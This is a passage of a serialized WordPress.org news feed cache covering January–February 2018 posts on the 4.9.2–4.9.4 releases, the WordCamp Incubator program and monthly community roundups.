Lashbrooke\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:5936:\"<p>Judging by the flurry of activity across the WordPress project throughout February, it looks like everyone is really getting into the swing of things for 2018. There have been a lot of interesting new developments, so read on to see what the community has been up to for the past month.</p>\n\n<hr class=\"wp-block-separator\" />\n\n<h2>WordPress 4.9.3 &amp; 4.9.4</h2>\n\n<p>Early in the month, <a href=\"https://wordpress.org/news/2018/02/wordpress-4-9-3-maintenance-release/\">version 4.9.3 of WordPress was released</a>, including a number of important bug fixes. Unfortunately it introduced a bug that prevented many sites from automatically updating to future releases. To remedy this issue, <a href=\"https://wordpress.org/news/2018/02/wordpress-4-9-4-maintenance-release/\">version 4.9.4 was released</a> the following day requiring many people to manually update their sites.</p>\n\n<p>While this kind of issue is always regrettable, the good thing is that it was fixed quickly, and that not all sites had updated to 4.9.3 yet, which meant they bypassed the bug in that version.</p>\n\n<p>You can find out more technical information about this issue <a href=\"https://make.wordpress.org/core/2018/02/06/wordpress-4-9-4-release-the-technical-details/\">on the Core development blog</a>.</p>\n\n<h2>The WordCamp Incubator is Back</h2>\n\n<p>In 2016, the Global Community Team ran an experimental program to help spread WordPress to underserved areas by providing more significant organizing support for their first WordCamp event. This program was dubbed the WordCamp Incubator, and it was so successful in the three cities where it ran that <a href=\"https://wordpress.org/news/2018/02/wordcamp-incubator-2-0/\">the program is back for 2018</a>.</p>\n\n<p>Right now, the Community Team is looking for cities to be a part of this year’s incubator by <a href=\"https://wordcampcentral.polldaddy.com/s/wordcamp-incubator-program-2018-city-application\">taking applications</a>. Additionally, each incubator community will need an experienced WordCamp organizer to assist them as a co-lead organizer for their event — if that sounds interesting to you, then you can <a href=\"https://wordcampcentral.polldaddy.com/s/wordcamp-incubator-program-2018-co-lead-application\">fill in the application form for co-leads</a>.</p>\n\n<p>You can find out further information about the WordCamp Incubator <a href=\"https://make.wordpress.org/community/2018/02/19/wordcamp-incubator-program-2018-announcement/\">on the Community Team blog</a>.</p>\n\n<h2>WordPress Meetup Roundtables scheduled for March</h2>\n\n<p>In order to assist local WordPress meetup organizers with running their meetup groups, some members of the Community Team have organized <a href=\"https://make.wordpress.org/community/2018/02/23/wordpress-meetup-roundtables-scheduled-for-march/\">weekly meetup roundtable discussions through the month of March</a>.</p>\n\n<p>These will be run as video chats at 16:00 UTC every Wednesday this month and will be a great place for meetup organizers to come together and help each other out with practical ideas and advice.</p>\n\n<p>If you are not already in the WordPress meetup program and would like to join, you can find out more information in <a href=\"https://make.wordpress.org/community/handbook/meetup-organizer/welcome/\">the WordPress Meetup Organizer Handbook</a>.</p>\n\n<h2>GDPR Compliance in WordPress Core</h2>\n\n<p>The General Data Protection Regulation (GDPR) is an upcoming regulation that will affect all online services across Europe. In order to prepare for this, a working group has been formed to make sure that WordPress is compliant with the GDPR regulations.</p>\n\n<p>Aside from the fact that this will be a requirement for the project going forward, it will also have an important and significant impact on the privacy and security of WordPress as a whole. The working group has posted <a href=\"https://make.wordpress.org/core/2018/02/19/proposed-roadmap-tools-for-gdpr-compliance/\">their proposed roadmap</a> for this project and it looks very promising.</p>\n\n<p>To get involved in building WordPress Core, jump into the #gdpr-compliance channel in the <a href=\"https://make.wordpress.org/chat/\">Making WordPress Slack group</a>, and follow <a href=\"https://make.wordpress.org/core/\">the Core team blog</a>.</p>\n\n<hr class=\"wp-block-separator\" />\n\n<h2>Further Reading:</h2>\n\n<ul>\n    <li>WPShout published <a href=\"https://wpshout.com/complete-guide-wordpress-security/\">a thorough guide to WordPress security</a>.</li>\n    <li>The Community Team has published interesting statistics from the WordCamp program in <a href=\"https://make.wordpress.org/community/2018/02/27/wordcamps-in-2016/\">2016</a> and <a href=\"https://make.wordpress.org/community/2018/02/28/wordcamps-in-2017/\">2017</a>.</li>\n    <li><a href=\"https://make.wordpress.org/community/2018/02/15/potential-addition-of-a-new-onboarding-team/\">An intriguing proposal has been made</a> for a new ‘Onboarding’ team to be started in the WordPress project.</li>\n    <li>The new editing experience for WordPress, named Gutenberg, continues to be actively developed with <a href=\"https://make.wordpress.org/core/2018/02/16/whats-new-in-gutenberg-16th-february/\">a feature-packed release</a> this past month.</li>\n    <li>The Advanced WordPress Facebook group <a href=\"https://www.youtube.com/watch?v=4vS_jR5-nIo\">held an interview with WordPress co-founder, Matt Mullenweg</a> about the Gutenberg project.</li>\n    <li><a href=\"https://make.wordpress.org/meta/2018/02/27/two-factor-authentication-on-wp-org/\">Two factor authentication is on its way to the WordPress.org network</a> — this will be a great improvement to the overall security of the project.</li>\n</ul>\n\n<p><em>If you have a story we should consider including in the next “Month in WordPress” post, please <a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\">submit it here</a>.</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"5613\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n				\n		\n		\n\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"WordCamp Incubator 2.0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://wordpress.org/news/2018/02/wordcamp-incubator-2-0/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 21 Feb 2018 22:53:20 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:9:\"Community\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:6:\"Events\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:8:\"WordCamp\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=5577\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:343:\"WordCamps are informal, community-organized events that are put together by a team of local WordPress users who have a passion for growing their communities. They are born out of active WordPress meetup groups that meet regularly and are able to host an annual WordCamp event. This has worked very well in many communities, with over [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Hugh Lashbrooke\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2450:\"<p><a href=\"https://central.wordcamp.org/\">WordCamps</a> are informal, community-organized events that are put together by a team of local WordPress users who have a passion for growing their communities. They are born out of active WordPress meetup groups that meet regularly and are able to host an annual WordCamp event. This has worked very well in many communities, with over 120 WordCamps being hosted around the world in 2017.<br /></p>\n\n<p>Sometimes though, passionate and enthusiastic community members can’t pull together enough people in their community to make a WordCamp happen. To address this, we introduced <a href=\"https://wordpress.org/news/2016/02/experiment-wordcamp-incubator/\">the WordCamp Incubator program</a> in 2016.<br /></p>\n\n<p>The goal of the incubator program is <strong>to help spread WordPress to underserved areas by providing more significant organizing support for their first WordCamp event.</strong> In 2016, members of <a href=\"https://make.wordpress.org/community/\">the global community team</a> worked with volunteers in three cities — Denpasar, Harare and Medellín — giving direct, hands-on assistance in making local WordCamps possible. All three of these WordCamp incubators <a href=\"https://make.wordpress.org/community/2017/06/30/wordcamp-incubator-report/\">were a great success</a>, so we&#x27;re bringing the incubator program back for 2018.<br /></p>\n\n<p>Where should the next WordCamp incubators be? If you have always wanted a WordCamp in your city but haven’t been able to get a community started, this is a great opportunity. We will be taking applications for the next few weeks, then will get in touch with everyone who applied to discuss the possibilities. We will announce the chosen cities by the end of March.<br /></p>\n\n<p><strong>To apply, </strong><a href=\"https://wordcampcentral.polldaddy.com/s/wordcamp-incubator-program-2018-city-application\"><strong>fill in the application</strong></a><strong> by March 15, 2018.</strong> You don’t need to have any specific information handy, it’s just a form to let us know you’re interested. You can apply to nominate your city even if you don’t want to be the main organizer, but for this to work well we will need local liaisons and volunteers, so please only nominate cities where you live or work so that we have at least one local connection to begin.<br /></p>\n\n<p>We&#x27;re looking forward to hearing from you!<br /></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"5577\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:36:\"\n		\n		\n		\n		\n				\n		\n\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"WordPress 4.9.4 Maintenance Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/news/2018/02/wordpress-4-9-4-maintenance-release/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 06 Feb 2018 16:17:55 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:3:\"4.9\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=5559\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:350:\"WordPress 4.9.4 is now available. This maintenance release fixes a severe bug in 4.9.3, which will cause sites that support automatic background updates to fail to update automatically, and will require action from you (or your host) for it to be updated to 4.9.4. Four years ago with WordPress 3.7 &#8220;Basie&#8221;, we added the ability [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Dion Hulse\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1823:\"<p>WordPress 4.9.4 is now available.</p>\n<p>This maintenance release fixes a severe bug in 4.9.3, which will cause sites that support automatic background updates to fail to update automatically, and will require action from you (or your host) for it to be updated to 4.9.4.</p>\n<p>Four years ago with <a href=\"https://wordpress.org/news/2013/10/basie/\">WordPress 3.7 &#8220;Basie&#8221;</a>, we added the ability for WordPress to self-update, keeping your website secure and bug-free, even when you weren&#8217;t available to do it yourself. For four years it&#8217;s helped keep millions of installs updated with very few issues over that time. Unfortunately <a href=\"https://wordpress.org/news/2018/02/wordpress-4-9-3-maintenance-release/\">yesterdays 4.9.3 release</a> contained a severe bug which was only discovered after release. The bug will cause WordPress to encounter an error when it attempts to update itself to WordPress 4.9.4, and will require an update to be performed through the WordPress dashboard or hosts update tools.</p>\n<p>WordPress managed hosting companies who install updates automatically for their customers can install the update as normal, and we&#8217;ll be working with other hosts to ensure that as many customers of theirs who can be automatically updated to WordPress 4.9.4 can be.</p>\n<p>For more technical details of the issue, we&#8217;ve <a href=\"https://make.wordpress.org/core/2018/02/06/wordpress-4-9-4-release-the-technical-details/\">posted on our Core Development blog</a>. For a full list of changes, consult the <a href=\"https://core.trac.wordpress.org/query?status=closed&amp;milestone=4.9.4&amp;group=component\">list of tickets</a>.</p>\n<p><a href=\"https://wordpress.org/download/\">Download WordPress 4.9.4</a> or visit Dashboard → Updates and click “Update Now.”</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"5559\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:33:\"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"WordPress 4.9.3 Maintenance Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/news/2018/02/wordpress-4-9-3-maintenance-release/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Feb 2018 19:47:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=5545\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:372:\"WordPress 4.9.3 is now available. This maintenance release fixes 34 bugs in 4.9, including fixes for Customizer changesets, widgets, visual editor, and PHP 7.2 compatibility. For a full list of changes, consult the list of tickets and the changelog. Download WordPress 4.9.3 or visit Dashboard → Updates and click “Update Now.” Sites that support automatic [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Sergey Biryukov\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3421:\"<p>WordPress 4.9.3 is now available.</p>\n<p>This maintenance release fixes 34 bugs in 4.9, including fixes for Customizer changesets, widgets, visual editor, and PHP 7.2 compatibility. For a full list of changes, consult the <a href=\"https://core.trac.wordpress.org/query?status=closed&amp;milestone=4.9.3&amp;group=component\">list of tickets</a> and the <a href=\"https://core.trac.wordpress.org/log/branches/4.9?rev=42630&amp;stop_rev=42521\">changelog</a>.</p>\n<p><a href=\"https://wordpress.org/download/\">Download WordPress 4.9.3</a> or visit Dashboard → Updates and click “Update Now.” Sites that support automatic background updates are already beginning to update automatically.</p>\n<p>Thank you to everyone who contributed to WordPress 4.9.3:</p>\n<p><a href=\"https://profiles.wordpress.org/jorbin/\">Aaron Jorbin</a>, <a href=\"https://profiles.wordpress.org/abdullahramzan/\">abdullahramzan</a>, <a href=\"https://profiles.wordpress.org/adamsilverstein/\">Adam Silverstein</a>, <a href=\"https://profiles.wordpress.org/afercia/\">Andrea Fercia</a>, <a href=\"https://profiles.wordpress.org/andreiglingeanu/\">andreiglingeanu</a>, <a href=\"https://profiles.wordpress.org/azaozz/\">Andrew Ozz</a>, <a href=\"https://profiles.wordpress.org/bpayton/\">Brandon Payton</a>, <a href=\"https://profiles.wordpress.org/chetan200891/\">Chetan Prajapati</a>, <a href=\"https://profiles.wordpress.org/coleh/\">coleh</a>, <a href=\"https://profiles.wordpress.org/darko-a7/\">Darko A7</a>, <a href=\"https://profiles.wordpress.org/desertsnowman/\">David Cramer</a>, <a href=\"https://profiles.wordpress.org/dlh/\">David Herrera</a>, <a href=\"https://profiles.wordpress.org/dd32/\">Dion Hulse</a>, <a href=\"https://profiles.wordpress.org/flixos90/\">Felix Arntz</a>, <a href=\"https://profiles.wordpress.org/frank-klein/\">Frank Klein</a>, <a href=\"https://profiles.wordpress.org/pento/\">Gary Pendergast</a>, <a href=\"https://profiles.wordpress.org/audrasjb/\">Jb Audras</a>, <a href=\"https://profiles.wordpress.org/jbpaul17/\">Jeffrey Paul</a>, <a href=\"https://profiles.wordpress.org/lizkarkoski/\">lizkarkoski</a>, <a href=\"https://profiles.wordpress.org/clorith/\">Marius L. J.</a>, <a href=\"https://profiles.wordpress.org/mattyrob/\">mattyrob</a>, <a href=\"https://profiles.wordpress.org/monikarao/\">Monika Rao</a>, <a href=\"https://profiles.wordpress.org/munyagu/\">munyagu</a>, <a href=\"https://profiles.wordpress.org/ndavison/\">ndavison</a>, <a href=\"https://profiles.wordpress.org/nickmomrik/\">Nick Momrik</a>, <a href=\"https://profiles.wordpress.org/peterwilsoncc/\">Peter Wilson</a>, <a href=\"https://profiles.wordpress.org/rachelbaker/\">Rachel Baker</a>, <a href=\"https://profiles.wordpress.org/rishishah/\">rishishah</a>, <a href=\"https://profiles.wordpress.org/othellobloke/\">Ryan Paul</a>, <a href=\"https://profiles.wordpress.org/sasiddiqui/\">Sami Ahmed Siddiqui</a>, <a href=\"https://profiles.wordpress.org/sayedwp/\">Sayed Taqui</a>, <a href=\"https://profiles.wordpress.org/seanchayes/\">Sean Hayes</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov/\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/shooper/\">Shawn Hooper</a>, <a href=\"https://profiles.wordpress.org/netweb/\">Stephen Edgar</a>, <a href=\"https://profiles.wordpress.org/manikmist09/\">Sultan Nasir Uddin</a>, <a href=\"https://profiles.wordpress.org/tigertech/\">tigertech</a>, and <a href=\"https://profiles.wordpress.org/westonruter/\">Weston Ruter</a>.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"5545\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:33:\"\n		\n		\n		\n		\n				\n\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"The Month in WordPress: January 2018\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wordpress.org/news/2018/02/the-month-in-wordpress-january-2018/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 02 Feb 2018 08:10:07 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Month in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=5541\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:339:\"Things got off to a gradual start in 2018 with momentum starting to pick up over the course of the month. There were some notable developments in January, including a new point release and work being done on other important areas of the WordPress project. WordPress 4.9.2 Security and Maintenance Release On January 16, WordPress [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Hugh Lashbrooke\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:3840:\"<p>Things got off to a gradual start in 2018 with momentum starting to pick up over the course of the month. There were some notable developments in January, including a new point release and work being done on other important areas of the WordPress project.</p>\n\n<hr class=\"wp-block-separator\" />\n\n<h2>WordPress 4.9.2 Security and Maintenance Release</h2>\n\n<p>On January 16, <a href=\"https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/\">WordPress 4.9.2 was released</a> to fix an important security issue with the media player, as well as a number of other smaller bugs. This release goes a long way to smoothing out the 4.9 release cycle with the next point release, v4.9.3, <a href=\"https://make.wordpress.org/core/2018/01/31/wordpress-4-9-3-release-pushed-to-february-5th/\">due in early February</a>.</p>\n\n<p>To get involved in building WordPress Core, jump into the #core channel in the<a href=\"https://make.wordpress.org/chat/\"> Making WordPress Slack group</a>, and follow<a href=\"https://make.wordpress.org/core/\"> the Core team blog</a>.</p>\n\n<h2>Updated Plugin Directory Guidelines</h2>\n\n<p>At the end of 2017, <a href=\"https://developer.wordpress.org/plugins/wordpress-org/detailed-plugin-guidelines/\">the guidelines for the Plugin Directory</a> received a significant update to make them clearer and expanded to address certain situations. This does not necessarily make these guidelines complete, but rather more user-friendly and practical; they govern how developers build plugins for the Plugin Directory, so they need to evolve with the global community that the Directory serves.</p>\n\n<p>If you would like to contribute to these guidelines, you can make a pull request to <a href=\"https://github.com/WordPress/wporg-plugin-guidelines\">the GitHub repository</a> or email <a href=\"mailto:plugins@wordpress.org\">plugins@wordpress.org</a>. You can also jump into the #pluginreview channel in the<a href=\"https://make.wordpress.org/chat/\"> Making WordPress Slack group</a>.</p>\n\n<hr class=\"wp-block-separator\" />\n\n<h2>Further Reading:</h2>\n\n<ul>\n    <li>Near the end of last year a lot of work was put into improving the standards in the WordPress core codebase and now <a href=\"https://make.wordpress.org/core/2017/11/30/wordpress-php-now-mostly-conforms-to-wordpress-coding-standards/\">the entire platform is at nearly 100% compliance with the WordPress coding standards</a>.</li>\n    <li>Gutenberg, the new editor coming to WordPress core in the next major release, <a href=\"https://make.wordpress.org/core/2018/01/25/whats-new-in-gutenberg-25th-january/\">was updated to v2.1 this month</a> with some great usability and technical improvements.</li>\n    <li>The Global Community Team is <a href=\"https://make.wordpress.org/community/2018/01/16/2018-goals-for-the-global-community-team-suggestions-time/\">taking suggestions for the goals of the Community program in 2018</a>.</li>\n    <li><a href=\"https://online.wpcampus.org/\">WPCampus Online</a>, a digital conference focused on WordPress in higher education, took place on January 30. The videos of the event sessions will be online soon.</li>\n    <li>A WordPress community member <a href=\"https://wptavern.com/new-toolkit-simplifies-the-process-of-creating-gutenberg-blocks\">has released a toolkit</a> to help developers build blocks for Gutenberg.</li>\n    <li>The community team that works to improve the WordPress hosting experience is relatively young, but <a href=\"https://make.wordpress.org/hosting/2018/01/25/hosting-meeting-notes-january-10-2018/\">they have been making some great progress recently</a>.</li>\n</ul>\n\n<p><em>If you have a story we should consider including in the next “Month in WordPress” post, please <a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\">submit it here</a>.</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"5541\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n				\n		\n		\n\n		\n		\n				\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"WordPress 4.9.2 Security and Maintenance Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 16 Jan 2018 23:00:14 